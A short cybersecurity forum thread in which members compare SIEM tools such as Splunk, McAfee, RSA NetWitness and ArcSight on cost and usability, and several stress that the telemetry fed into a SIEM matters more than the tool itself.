Welcome to the
CyberIQs Knowledge Centre

Notifications
Clear all

SIEM tool


bharaths
(@bharaths)
Active Member
Joined: 8 months ago
Posts: 6
Topic starter  

Would like to have inputs from everyone - which SIEM tool is cost effective and quickly understandable in monitoring perspective?


Quote
socpuppet
(@socpuppet)
Active Member
Joined: 10 months ago
Posts: 13
 

Splunk is the boss of the sock 😀


bharaths liked
ReplyQuote
nextCISO
(@nextciso)
Active Member
Joined: 10 months ago
Posts: 6
 

Wow, this question is like opening a can of worms.I say it because often, the SIEM solution is not that important as the telemetry you ingest in the SIEM. Of course an EDR  in the endpoint with ATT&CK signatures and good app and network coverage should get any SIEM to do the work.

I personally have worked with Splunk, RSA netwitness and logrhthym and McAfee.The one I see often deployed is Splunk(not a SIEM ) and McAfee which seems a commodity well rounded SIEM but nothing in the high end.


ReplyQuote
patrik_sam
(@patrik_sam)
New Member
Joined: 10 months ago
Posts: 4
 

Throughout my career I have used ArcSigh ( a bit dated these days) and Splunk. As already said, the SIEM is just the tool, the telemetry ingested is the real deal.


ReplyQuote
0day
 0day
(@0day)
New Member
Joined: 9 months ago
Posts: 4
 

The least cost effective solution mentioned is Splunk as the cost is prohibited for many organisations. Splunk's pricing model is based around the data you need to process, traditional SIEM do not based the price around the data, but around special features to tackle security monitoring and detection issues. Splunk as someone said above, it is not a solution specifically design for the security industry although it seems to be widely adopted especially in big enterprises which are the ones that can stand the high costs.


ReplyQuote
Share: